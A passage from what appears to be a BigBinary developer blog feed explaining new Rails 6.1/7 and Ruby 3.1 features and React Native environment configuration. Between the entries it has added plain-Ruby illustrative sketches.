=&gt; #&lt;User id: 1, name: &quot;Akhil&quot;, passport_number: &quot;BKLPG564&quot;, created_at: &quot;2021-04-15 10:27:50.800729000 +0000&quot;, updated_at: &quot;2021-04-15 10:27:50.800729000 +0000&quot;&gt;</code></pre><p>Under the hood, Rails 7 uses the <a href="https://github.com/rails/rails/blob/9a263e9a0ffb82faa6d3153fd1f35b814a366cd5/activerecord/lib/active_record/encryption/encryptable_record.rb#L7">EncryptableRecord</a> concern to perform encryption and decryption when saving and retrieving values from the database.</p><p>Check out the <a href="https://github.com/rails/rails/pull/41659">pull request</a> for more details of this encryption system. It is also documented in the <a href="https://edgeguides.rubyonrails.org/active_record_encryption.html">Ruby on Rails guides</a>.</p>]]></content>
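To see why the default scheme is non-deterministic, here is a minimal sketch using Ruby's stdlib OpenSSL. This is not Rails' actual implementation; the key handling and payload shape (loosely echoing the `p`/`iv`/`at` fields visible in the stored value above) are simplified assumptions:

```ruby
require "openssl"
require "base64"

# Assumed in-memory key for illustration only; Rails derives keys from the
# credentials set up by bin/rails db:encryption:init.
KEY = OpenSSL::Random.random_bytes(32)

# AES-256-GCM with a random IV: encrypting the same value twice yields
# different ciphertexts, which is what "non-deterministic" means here.
def encrypt(plaintext)
  cipher = OpenSSL::Cipher.new("aes-256-gcm").encrypt
  cipher.key = KEY
  iv = cipher.random_iv
  ciphertext = cipher.update(plaintext) + cipher.final
  { p: Base64.strict_encode64(ciphertext),
    iv: Base64.strict_encode64(iv),
    at: Base64.strict_encode64(cipher.auth_tag) }
end

def decrypt(payload)
  cipher = OpenSSL::Cipher.new("aes-256-gcm").decrypt
  cipher.key = KEY
  cipher.iv = Base64.strict_decode64(payload[:iv])
  cipher.auth_tag = Base64.strict_decode64(payload[:at])
  # final raises OpenSSL::Cipher::CipherError if the auth tag does not match
  cipher.update(Base64.strict_decode64(payload[:p])) + cipher.final
end
```

With this sketch, `decrypt(encrypt("BKLPG564"))` round-trips, while two calls to `encrypt` produce different `iv` and `p` values for the same input.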
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds invert_where method]]></title>
       <author><name>Chimed Palden</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-invert_where"/>
      <updated>2021-05-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-invert_where</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds an <code>invert_where</code> method that will invert all scope conditions.</p><p>Let's see an example.</p><pre><code class="language-ruby">class User
  scope :active, -&gt; { where(accepted: true, locked: false) }
end

&gt;&gt; User.all
=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, name: 'Rob', accepted: true, locked: true&gt;,
#&lt;User id: 2, name: 'Jack', accepted: false, locked: false&gt;,
#&lt;User id: 3, name: 'Nina', accepted: true, locked: false&gt;,
#&lt;User id: 4, name: 'Oliver', accepted: false, locked: true&gt;]&gt;</code></pre><p>Now let's query for active and inactive users:</p><pre><code class="language-ruby">&gt;&gt; User.active
# SELECT * FROM Users WHERE `accepted` = 1 AND `locked` = 0
=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 3, name: 'Nina', accepted: true, locked: false&gt;]&gt;

&gt;&gt; User.active.invert_where
# SELECT * FROM Users WHERE NOT (`accepted` = 1 AND `locked` = 0)
=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, name: 'Rob', accepted: true, locked: true&gt;,
#&lt;User id: 2, name: 'Jack', accepted: false, locked: false&gt;,
#&lt;User id: 4, name: 'Oliver', accepted: false, locked: true&gt;]&gt;</code></pre><p>As we can see above, if we use <code>invert_where</code> with multiple attributes, it negates the whole condition, applying <code>NOT (a AND b)</code> to the WHERE clause of the query. By De Morgan's Law, this is equivalent to <code>NOT a OR NOT b</code>, matching the second output.</p><p>Check out the <a href="https://github.com/rails/rails/pull/40249">pull request</a> for more details.</p>]]></content>
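The De Morgan equivalence can be checked with plain Ruby on the same four users, modeling the table as an array of hashes (not ActiveRecord):

```ruby
users = [
  { id: 1, name: "Rob",    accepted: true,  locked: true  },
  { id: 2, name: "Jack",   accepted: false, locked: false },
  { id: 3, name: "Nina",   accepted: true,  locked: false },
  { id: 4, name: "Oliver", accepted: false, locked: true  },
]

# The scope's condition: accepted = true AND locked = false
active = ->(u) { u[:accepted] && !u[:locked] }

active_ids = users.select { |u| active.call(u) }.map { |u| u[:id] }
# invert_where wraps the whole condition in NOT(...), i.e. NOT (a AND b),
# which is exactly what rejecting the scope's matches gives us.
inverted_ids = users.reject { |u| active.call(u) }.map { |u| u[:id] }

active_ids   # => [3]
inverted_ids # => [1, 2, 4]
```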
    </entry><entry>
       <title><![CDATA[Rails 7 adds Enumerable#sole]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-enumerable-sole"/>
      <updated>2021-04-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-enumerable-sole</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces the <code>Enumerable#sole</code> method, which can be used to find and assert the presence of exactly one element in the enumerable.</p><p>The <code>Enumerable#sole</code> method is an add-on to the <a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/FinderMethods.html#method-i-sole">ActiveRecord::FinderMethods#sole</a> and <a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/FinderMethods.html#method-i-find_sole_by">#find_sole_by</a> methods, which were recently added in Rails 6.1. Please check our blog (link not available) for more details on them.</p><pre><code class="language-ruby">=&gt; list = [&quot;Sole Element&quot;]
=&gt; list.sole
=&gt; &quot;Sole Element&quot;

=&gt; hash = { foo: &quot;bar&quot; }
=&gt; hash.sole
=&gt; [:foo, &quot;bar&quot;]</code></pre><p>The <code>Enumerable#sole</code> method raises an <code>Enumerable::SoleItemExpectedError</code> if the enumerable is empty or contains multiple elements. When the sole element is <code>nil</code>, it will be returned as the result.</p><pre><code class="language-ruby">=&gt; list = [nil]
=&gt; list.sole
=&gt; nil

=&gt; list = []
=&gt; list.sole
=&gt; `Enumerable::SoleItemExpectedError (no item found)`

=&gt; list = [&quot;Apple&quot;, &quot;Orange&quot;]
=&gt; list.sole
=&gt; `Enumerable::SoleItemExpectedError (multiple items found)`</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/40914">pull request</a> for more details.</p>]]></content>
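Since `Enumerable#sole` ships with Active Support rather than plain Ruby, here is a simplified portable sketch of its behavior. The real method raises `Enumerable::SoleItemExpectedError`; this stand-in uses a plain `RuntimeError`:

```ruby
# Simplified stand-in for ActiveSupport's Enumerable#sole (assumption: we
# raise RuntimeError instead of Enumerable::SoleItemExpectedError).
def sole(enum)
  # first(2) stops after two items, so this also works on lazy/infinite enums
  items = enum.first(2)
  raise "no item found" if items.empty?
  raise "multiple items found" if items.size > 1
  items.first
end

sole(["Sole Element"]) # => "Sole Element"
sole({ foo: "bar" })   # => [:foo, "bar"]
sole([nil])            # => nil
```

Note that a sole `nil` element is returned as-is, matching the documented behavior above.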
    </entry><entry>
       <title><![CDATA[Handling environment specific configurations in React Native]]></title>
       <author><name>Sourav Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/handling-environment-specific-configurations-in-react-native"/>
      <updated>2021-04-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/handling-environment-specific-configurations-in-react-native</id>
      <content type="html"><![CDATA[<p>Many modern-day applications now go through different stages of the product cycle, such as development, staging, production etc.</p><p>Having different environment variables for each environment will make it a lot easier to manage any application. This article is intended to share one solution to address this problem in React Native. We will be using a library called <a href="https://github.com/luggit/react-native-config">react-native-config</a> for this purpose; you can also try <a href="https://github.com/zetachang/react-native-dotenv">react-native-dotenv</a>.</p><p>We will be focusing on having three different bundles containing configuration files for the development, staging and production environments.</p><h2>Installing react-native-config</h2><p>Install the package:</p><pre><code class="language-bash">yarn add react-native-config</code></pre><p>For iOS, also run <code>pod install</code> after the package is installed.</p><h2>Setup for Android</h2><p>Add the line of code below to <code>android/app/build.gradle</code> to apply the plugin.</p><pre><code class="language-diff">apply plugin: &quot;com.android.application&quot;
+ apply from: project(':react-native-config').projectDir.getPath() + &quot;/dotenv.gradle&quot;</code></pre><p>Create three files in the root folder of the project: <code>.env.development</code>, <code>.env.staging</code> &amp; <code>.env.production</code>. These will contain our environment variables.</p><pre><code class="language-text"># .env.development
API_URL=https://myapi.development.com

# .env.staging
API_URL=https://myapi.staging.com

# .env.production
API_URL=https://myapi.com</code></pre><p>Now we need to define <code>envConfigFiles</code> in <code>build.gradle</code>, associating builds with env files. To achieve this, add the code below before the <code>apply from</code> call, and be sure to keep the build variant names in lowercase.</p><pre><code class="language-diff">+ project.ext.envConfigFiles = [
+   productiondebug: &quot;.env.production&quot;,
+   productionrelease: &quot;.env.production&quot;,
+   developmentrelease: &quot;.env.development&quot;,
+   developmentdebug: &quot;.env.development&quot;,
+   stagingrelease: &quot;.env.staging&quot;,
+   stagingdebug: &quot;.env.staging&quot;
+ ]

apply from: project(':react-native-config').projectDir.getPath() + &quot;/dotenv.gradle&quot;</code></pre><p>Next, add <code>productFlavors</code> in <code>build.gradle</code>, just below <code>buildTypes</code>.</p><pre><code class="language-text">flavorDimensions &quot;default&quot;

productFlavors {
  production {}
  staging {
    // We can have build-specific configurations here, like using applicationIdSuffix to create a different package name (e.g. &quot;.staging&quot;)
  }
  development {}
}</code></pre><p>The variant names combine a product flavor with a build type, so <code>productiondebug</code> matches the <code>production</code> flavor with the <code>debug</code> build type, generating a debug build of the app with the configuration from <code>.env.production</code>.</p><p>Also add <code>matchingFallbacks</code> in <code>buildTypes</code> as shown below:</p><pre><code class="language-diff">buildTypes {
  debug {
    signingConfig signingConfigs.debug
+   matchingFallbacks = ['debug', 'release']
  }
  release {
    signingConfig signingConfigs.debug
    minifyEnabled enableProguardInReleaseBuilds
    proguardFiles getDefaultProguardFile(&quot;proguard-android.txt&quot;), &quot;proguard-rules.pro&quot;
  }
}</code></pre><p>Add the scripts below to <code>scripts</code> in the <code>package.json</code> file.</p><pre><code class="language-javascript">&quot;android:staging&quot;: &quot;react-native run-android --variant=stagingdebug&quot;,
&quot;android:staging-release&quot;: &quot;react-native run-android --variant=stagingrelease&quot;,
&quot;android:dev&quot;: &quot;react-native run-android --variant=developmentdebug&quot;,
&quot;android:dev-release&quot;: &quot;react-native run-android --variant=developmentrelease&quot;,
&quot;android:prod&quot;: &quot;react-native run-android --variant=productiondebug&quot;,
&quot;android:prod-release&quot;: &quot;react-native run-android --variant=productionrelease&quot;,</code></pre><p>Now, to get a debug build with the staging environment, run:</p><pre><code class="language-bash">yarn android:staging</code></pre><p>Or, to get a release build with the staging environment, run:</p><pre><code class="language-bash">yarn android:staging-release</code></pre><h2>Setup for iOS</h2><p>In iOS we will create three new schemes, <code>TestAppDevelopment</code>, <code>TestAppStaging</code> &amp; <code>TestAppProduction</code>, containing configuration files for the development, staging and production environments respectively.</p><p>To create the schemes, open the project in Xcode &amp; do the following:</p><p>In the Xcode menu, go to Product &gt; Scheme &gt; Edit Scheme.</p><p>Click Duplicate Scheme at the bottom, name it <code>TestAppDevelopment</code>, and check the <code>Shared</code> checkbox.</p><p>We will repeat the above steps two more times (for <code>TestAppStaging</code> &amp; <code>TestAppProduction</code>).</p><p>Now edit each newly generated scheme. Expand the &quot;Build&quot; settings, click &quot;Pre-actions&quot;, and from the plus sign select &quot;New Run Script Action&quot;. Select the project from the <code>Provide build settings from</code> dropdown.</p><p>Where it says &quot;Type a script or drag a script file&quot;, type:</p><pre><code class="language-bash">cp &quot;${PROJECT_DIR}/../.env.staging&quot; &quot;${PROJECT_DIR}/../.env&quot;  # replace .env.staging with the env file for this scheme</code></pre><p>Add the scripts below to <code>scripts</code> in the <code>package.json</code> file.</p><pre><code class="language-javascript">&quot;ios:dev&quot;: &quot;react-native run-ios --scheme 'TestAppDevelopment'&quot;,
&quot;ios:prod&quot;: &quot;react-native run-ios --scheme 'TestAppProduction'&quot;,
&quot;ios:staging&quot;: &quot;react-native run-ios --scheme 'TestAppStaging'&quot;,</code></pre><p>Now, to get a build with the staging environment, run:</p><pre><code class="language-bash">yarn ios:staging</code></pre><p>And it will run the application with the staging configuration.</p><h2>Accessing environment variables</h2><p>Once the setup is complete, we can access the variables as shown below:</p><pre><code class="language-javascript">import Config from &quot;react-native-config&quot;;

Config.API_URL; // &quot;https://myapi.staging.com&quot;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3.1 accumulates Enumerable#tally results]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-accumulates-enumerable-tally-results"/>
      <updated>2021-04-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-accumulates-enumerable-tally-results</id>
      <content type="html"><![CDATA[<p>We already know the <a href="https://ruby-doc.org/core-2.7.0/Enumerable.html#method-i-tally">Enumerable#tally</a> method is used to count the occurrences of each element in an <code>Enumerable</code> collection. The <code>#tally</code> method was introduced in Ruby 2.7.0. Please check <a href="https://bigbinary.com/blog/ruby-2-7-adds-enumerable-tally">our blog</a> for more details on it.</p><p>Ruby 3.1 introduces an optional hash argument for the <code>Enumerable#tally</code> method. If a hash is given, the number of occurrences of each element is added to the hash's values, and the final hash is returned.</p><h2>Ruby 2.7.0+</h2><pre><code class="language-ruby">=&gt; letters = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;a&quot;, &quot;d&quot;, &quot;c&quot;, &quot;a&quot;, &quot;c&quot;, &quot;a&quot;]
=&gt; result = letters.tally
=&gt; {&quot;a&quot;=&gt;4, &quot;b&quot;=&gt;1, &quot;c&quot;=&gt;3, &quot;d&quot;=&gt;1}</code></pre><h2>Before Ruby 3.1</h2><pre><code class="language-ruby">=&gt; new_letters = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;a&quot;, &quot;c&quot;, &quot;a&quot;]
=&gt; new_letters.tally(result)
=&gt; ArgumentError (wrong number of arguments (given 1, expected 0))</code></pre><h2>After Ruby 3.1</h2><pre><code class="language-ruby">=&gt; new_letters = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;a&quot;, &quot;c&quot;, &quot;a&quot;]
=&gt; new_letters.tally(result)
=&gt; {&quot;a&quot;=&gt;7, &quot;b&quot;=&gt;2, &quot;c&quot;=&gt;5, &quot;d&quot;=&gt;1}</code></pre><p>The value corresponding to each element in the hash must be an integer. Otherwise, the method raises a <code>TypeError</code> on execution.</p><p>If a default value is defined for the given hash, it will be ignored, and only the actual counts of occurrences appear in the returned hash.</p><pre><code class="language-ruby">=&gt; letters = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;a&quot;]
=&gt; letters.tally(Hash.new(10))
=&gt; {&quot;a&quot;=&gt;2, &quot;b&quot;=&gt;1, &quot;c&quot;=&gt;1}</code></pre><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/4318">pull request</a> and <a href="https://bugs.ruby-lang.org/issues/17744">feature discussion</a> for this change.</p>]]></content>
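On Rubies older than 3.1, the same accumulation can be reproduced with a small helper (our own sketch, not Ruby's implementation). Using `Hash#fetch` with a default of 0 also reproduces the documented behavior of ignoring the hash's default value:

```ruby
# Portable sketch of Ruby 3.1's tally(hash): counts are added on top of the
# values already present in the accumulator hash.
def tally_into(enum, acc = {})
  enum.each_with_object(acc) do |element, counts|
    # fetch ignores any default value the hash was constructed with,
    # matching Ruby 3.1's behavior for Hash.new(10) etc.
    counts[element] = counts.fetch(element, 0) + 1
  end
end

result = tally_into(["a", "b", "c", "a", "d", "c", "a", "c", "a"])
result # => {"a"=>4, "b"=>1, "c"=>3, "d"=>1}

tally_into(["a", "b", "c", "a", "c", "a"], result)
# => {"a"=>7, "b"=>2, "c"=>5, "d"=>1}
```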
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds support for validating numeric values that fall within a specific range using the `in:` option]]></title>
       <author><name>Akanksha Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-validate-numericality-in-range-option"/>
      <updated>2021-04-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-validate-numericality-in-range-option</id>
      <content type="html"><![CDATA[<p>Before Rails 6.1, to validate a numerical value that falls within a specific range, we had to use <code>greater_than_or_equal_to:</code> and <code>less_than_or_equal_to:</code>.</p><p>In the example below, we want to add a validation that ensures that each item in the <code>StockItem</code> class has a quantity that ranges from 50 to 100.</p><pre><code class="language-ruby">class StockItem &lt; ApplicationRecord
  validates :quantity, numericality: { greater_than_or_equal_to: 50, less_than_or_equal_to: 100 }
end

StockItem.create! code: 'Shirt-07', quantity: 40
#=&gt; ActiveRecord::RecordInvalid (Validation failed: Quantity must be greater than or equal to 50)</code></pre><p>In Rails 6.1, to validate that a numerical value falls within a specific range, we can use the new <code>in:</code> option:</p><pre><code class="language-ruby">class StockItem &lt; ApplicationRecord
  validates :quantity, numericality: { in: 50..100 }
end

StockItem.create! code: 'Shirt-07', quantity: 40
#=&gt; ActiveRecord::RecordInvalid (Validation failed: Quantity must be in 50..100)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/41022">pull request</a> for more details on this feature.</p>]]></content>
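The validation boils down to a range-inclusion check. A plain-Ruby sketch of that check (our own helper, not the Rails validator):

```ruby
# Plain-Ruby sketch of the check behind numericality: { in: 50..100 }.
# Range#cover? compares against the endpoints, inclusive on both ends here.
def quantity_in_range?(quantity, range = 50..100)
  range.cover?(quantity)
end

quantity_in_range?(40)  # => false
quantity_in_range?(50)  # => true
quantity_in_range?(100) # => true
```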
    </entry><entry>
       <title><![CDATA[Ruby 3.1 adds Enumerable#compact and Enumerator::Lazy#compact]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-adds-enumerable-compact"/>
      <updated>2021-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-adds-enumerable-compact</id>
      <content type="html"><![CDATA[<p>We are familiar with the <a href="https://apidock.com/ruby/v1_9_3_392/Array/compact">compact</a> method associated with arrays. The <code>compact</code> method returns a copy of the array after removing all <code>nil</code> elements.</p><p>Ruby 3.1 introduces the <code>compact</code> method in the <code>Enumerable</code> module. Now we can use the <code>compact</code> method with the <code>Enumerator</code> and <code>Enumerator::Lazy</code> classes, which include the <code>Enumerable</code> module.</p><h2>Before Ruby 3.1</h2><pre><code class="language-ruby">=&gt; enum = [1, nil, 3, nil, 5].to_enum
=&gt; #&lt;Enumerator: ...&gt;
=&gt; enum.compact
=&gt; NoMethodError (undefined method `compact' for #&lt;Enumerator: [1, nil, 3, nil, 5]:each&gt;)
=&gt; enum.reject { |x| x.nil? }
=&gt; [1, 3, 5]</code></pre><h2>After Ruby 3.1</h2><pre><code class="language-ruby">=&gt; enum = [1, nil, 3, nil, 5].to_enum
=&gt; #&lt;Enumerator: ...&gt;
=&gt; enum.compact
=&gt; [1, 3, 5]</code></pre><p>We can use the <code>compact</code> method to remove all <code>nil</code> occurrences from any class that includes the <code>Enumerable</code> module.</p><pre><code class="language-ruby">class Person
  include Enumerable

  attr_accessor :names

  def initialize(names = [])
    @names = names
  end

  def each(&amp;block)
    @names.each(&amp;block)
  end
end

=&gt; list = Person.new([&quot;John&quot;, nil, &quot;James&quot;, nil])
=&gt; #&lt;Person:0x0000000101cd3de8 @names=[&quot;John&quot;, nil, &quot;James&quot;, nil]&gt;
=&gt; list.compact
=&gt; [&quot;John&quot;, &quot;James&quot;]</code></pre><p>Similarly, lazy evaluation can be chained with the <code>compact</code> method to remove all <code>nil</code> entries from the <code>Enumerator</code> collection.</p><pre><code class="language-ruby">=&gt; enum = [1, nil, 3, nil, 5].to_enum.lazy.compact
=&gt; #&lt;Enumerator::Lazy: ...&gt;
=&gt; enum.force
=&gt; [1, 3, 5]

=&gt; list = Person.new([&quot;John&quot;, nil, &quot;James&quot;, nil]).lazy.compact
=&gt; #&lt;Enumerator::Lazy: ...&gt;
=&gt; list.force
=&gt; [&quot;John&quot;, &quot;James&quot;]</code></pre><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/3851">pull request</a> and <a href="https://bugs.ruby-lang.org/issues/17312">feature discussion</a> for this change.</p>]]></content>
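On Rubies before 3.1, the same result for any `Enumerable` can be had with `reject`. The `Person` class below mirrors the one from the post, and the helper name is our own:

```ruby
class Person
  include Enumerable

  attr_accessor :names

  def initialize(names = [])
    @names = names
  end

  def each(&block)
    @names.each(&block)
  end
end

# Portable equivalent of Enumerable#compact (Ruby 3.1+) for older Rubies.
def compact_enum(enum)
  enum.reject(&:nil?)
end

list = Person.new(["John", nil, "James", nil])
compact_enum(list) # => ["John", "James"]
```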
    </entry><entry>
       <title><![CDATA[Rails 7 allows constructors (build_association and create_association) on has_one :through associations]]></title>
       <author><name>Akanksha Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-allows-build-and-create-association-constructors-on-has-one-through"/>
      <updated>2021-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-allows-build-and-create-association-constructors-on-has-one-through</id>
      <content type="html"><![CDATA[<p>&lt;br/&gt;</p><h3>What are <code>build_association</code> and <code>create_association</code> constructors?</h3><p>When we declare either a <code>belongs_to</code> or <code>has_one</code> association,the declaring class automatically gains the following methodsrelated to the association:</p><ol><li>build_association(attributes = {})</li><li>create_association(attributes = {})</li></ol><p>In the above methods_<code>association</code> is replaced with the symbol(association name)passed as the first argument while declaring the associations.For example:</p><pre><code class="language-ruby">class Book &lt; ApplicationRecord  belongs_to :authorend@book.build_author(name: 'John Doe', email: 'john_doe@example.com')#=&gt; Returns a new Author object, instantiated with the passed attributes#=&gt; Links through the book's object foreign key#=&gt; New author object won't be saved in the database@book.create_author(name: 'John Doe', email: 'john_doe@example.com')#=&gt; Returns a new Author object, instantiated with the passed attributes#=&gt; Links through the book's object foreign key#=&gt; The new author object will be saved in the database after passing all of the validations specified on the Author model</code></pre><h3>Before Rails 7</h3><p>The <code>build_association</code> and <code>create_association</code> constructorswere only supported by<code>belongs_to</code> and <code>has_one</code> associations.</p><p>Consider the example below.We have a model, <strong>Member</strong>,that has a <code>has_one</code> associationwith the <strong>CurrentMembership</strong> model.It also has a <code>has_one :through</code> associationwith the <strong>Club</strong> model.</p><pre><code class="language-ruby">class Member &lt; ApplicationRecord  has_one :current_membership  has_one :club, through: :current_membershipend@member.build_club#=&gt; NoMethodError (undefined method `build_club' for #&lt;Member:0x00007f9ea2ebd3e8&gt;)#=&gt; Did you mean?  
build_current_membership@member.create_club#=&gt; NoMethodError (undefined method `create_club' for #&lt;Member:0x00007f9ea2ebd3e8&gt;)#=&gt; Did you mean?  create_current_membership</code></pre><h3>After Rails 7</h3><p>Users are allowed to use constructors(<code>build_association</code> and <code>create_association</code>)on <code>has_one :through</code> associationsalong with <code>belongs_to</code> and <code>has_one</code> associations.</p><pre><code class="language-ruby">class Member &lt; ApplicationRecord  has_one :current_membership  has_one :club, through: :current_membershipend@member.build_club#=&gt; #&lt;Club:0x00007f9ea01a8ce0&gt;@member.create_club#=&gt; #&lt;Club:0x00007f9ea01a8ce0&gt;</code></pre><p>Check out this<a href="https://github.com/rails/rails/pull/40007">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds delegated_type to ActiveRecord]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-delegated-type-to-active-record"/>
      <updated>2021-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-delegated-type-to-active-record</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds <code>delegated_type</code> to ActiveRecord, which makes it easier for models to share responsibilities.</p><h2>Before Rails 6.1</h2><p>Let's say we are building software to manage the inventory of an automobile company. It produces 2 types of vehicles, <code>Car</code> and <code>Motorcycle</code>. Both have <code>name</code> and <code>mileage</code> attributes.</p><p>Let's look at 2 different solutions to design this system.</p><h3>Single Table Inheritance</h3><p>In this approach, we combine all the attributes of the various models and store them in a single table. Let's create a <code>Vehicle</code> model and its corresponding table to store the data of both <code>Car</code> and <code>Motorcycle</code>.</p><pre><code class="language-ruby"># schema of Vehicle {id: Integer, type: String[car or motorcycle], name: String, mileage: Integer}
class Vehicle &lt; ApplicationRecord
  # put common logic here
end

class Car &lt; Vehicle
  # put car-specific code &amp; validation
end

class Motorcycle &lt; Vehicle
  # put motorcycle-specific code &amp; validation
end</code></pre><p>This approach fits precisely for this scenario, but when the attributes of the various models differ, it becomes a pain point. Let's say at some point in time we add a <code>bs4_engine</code> boolean column to track whether a <code>Motorcycle</code> has a <code>bs4_engine</code> or not. In the case of <code>Car</code>, <code>bs4_engine</code> will contain <code>nil</code>. As time passes, a lot of vehicle-specific attributes get added and the database will be sparsely filled with a lot of <code>nil</code> values.</p><h3>Polymorphic Relations</h3><p>With polymorphic associations, a model can belong to more than one other model, on a single association.</p><pre><code class="language-ruby"># schema {name: String, mileage: Integer}
class Vehicle &lt; ApplicationRecord
  belongs_to :vehicleable, polymorphic: true
end

# schema {interior_color: String, adjustable_roof: Boolean}
class Car &lt; ApplicationRecord
  has_one :vehicle, as: :vehicleable
end

# schema {bs4_engine: Boolean, tank_color: String}
class Motorcycle &lt; ApplicationRecord
  has_one :vehicle, as: :vehicleable
end</code></pre><p>Here, <code>Vehicle</code> is a class that contains common attributes, while <code>Motorcycle</code> and <code>Car</code> store any diverging attributes. This approach fixes the <code>nil</code> values, but to create a <code>Vehicle</code> record we now have to create a <code>Car</code> or <code>Motorcycle</code> separately first.</p><pre><code class="language-ruby"># creating new records
&gt;&gt; bike = Motorcycle.create!(bs4_engine: false, tank_color: '#f2f2f2')
#&lt;Motorcycle id: 1, bs4_engine: false, tank_color: '#f2f2f2', created_at: &quot;2021-01-17 ...&quot;&gt;
&gt;&gt; vehicle = Vehicle.create!(vehicleable: bike, name: 'TS-1987', mileage: 45)
#&lt;Vehicle id: 1, vehicleable_type: &quot;Motorcycle&quot;, vehicleable_id: 1, name: &quot;TS-1987&quot;, mileage: 45, created_at: ...&quot;&gt;

# query
&gt;&gt; b1 = Motorcycle.find(1)
#=&gt; &lt;Motorcycle id: 1, bs4_engine: false, tank_color: '#f2f2f2', created_at: &quot;2021-01-17 ...&quot;&gt;
&gt;&gt; b1.vehicle.name  #=&gt; TS-1987
&gt;&gt; b1.vehicle.mileage  #=&gt; 45</code></pre><p>Now, let's say we need to query Vehicles that are Motorcycles, or we want to check whether a Vehicle is a Car or not. For all of these, we will have to write cumbersome logic and queries.</p><h2>Rails 6.1 <code>delegated_type</code></h2><p>Rails 6.1 brings <code>delegated_type</code>, which fixes the problems discussed above and adds a lot of helper methods. To use it, we just need to replace the polymorphic relation with <code>delegated_type</code>.</p><pre><code class="language-ruby">class Vehicle &lt; ApplicationRecord
  delegated_type :vehicleable, types: %w[ Motorcycle Car ]
end</code></pre><p>That is the only change we need to make to leverage <code>delegated_type</code>. With this change, we can create both the delegator and delegatee at the same time.</p><pre><code class="language-ruby"># creating new records
&gt;&gt; vehicle1 = Vehicle.create!(vehicleable: Car.new(interior_color: '#fff', adjustable_roof: true), name: 'TS78Z', mileage: 89)
#&lt;Vehicle id: 3, vehicleable_type: &quot;Car&quot;, vehicleable_id: 2, name: &quot;TS78Z&quot;, mileage: 89, created_at: ...&quot;&gt;
&gt;&gt; vehicle2 = Vehicle.create!(vehicleable: Motorcycle.new(bs4_engine: false, tank_color: '#ff00bb'), name: 'BL96', mileage: 45)
#&lt;Vehicle id: 4, vehicleable_type: &quot;Motorcycle&quot;, vehicleable_id: 5, name: &quot;BL96&quot;, mileage: 45, created_at: ...&quot;&gt;

# Note: Just initializing the delegatee (Car.new/Motorcycle.new) is sufficient.</code></pre><p>When it comes to query capabilities, it adds a lot of delegated type convenience methods.</p><pre><code class="language-ruby"># Get all Vehicles that are Cars
&gt;&gt; Vehicle.cars
#&lt;ActiveRecord::Relation [#&lt;Vehicle id: 3, vehicleable_type: &quot;Car&quot;, vehicleable_id: 2, name: &quot;TS78Z&quot;, ...&quot;&gt;]&gt;

# Get all Vehicles that are Motorcycles
&gt;&gt; Vehicle.motorcycles
#&lt;ActiveRecord::Relation [#&lt;Vehicle id: 4, vehicleable_type: &quot;Motorcycle&quot;, vehicleable_id: 5, name: &quot;BL96&quot;, ...&quot;&gt;]&gt;

&gt;&gt; vehicle = Vehicle.find(3)
#&lt;Vehicle id: 3, vehicleable_type: &quot;Car&quot;, vehicleable_id: 2, name: &quot;TS78Z&quot;, mileage: 89, created_at: ...&quot;&gt;

# check whether a Vehicle is a Car or Motorcycle
&gt;&gt; vehicle.car?  #=&gt; true
&gt;&gt; vehicle.motorcycle? #=&gt; false

# get the vehicleable
&gt;&gt; vehicle.car # &lt;Car id: 2, adjustable_roof: true, ...&gt;
&gt;&gt; vehicle.motorcycle # nil</code></pre><p>So, <code>delegated_type</code> can be thought of as sugar on top of polymorphic relations that adds convenience methods.</p><p>Check out the <a href="https://github.com/rails/rails/pull/39341/files">pull request</a> to learn more.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Handling authentication state in React Native]]></title>
       <author><name>Ajay Sivan</name></author>
      <link href="https://www.bigbinary.com/blog/handling-authentication-state-in-react-native"/>
      <updated>2021-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/handling-authentication-state-in-react-native</id>
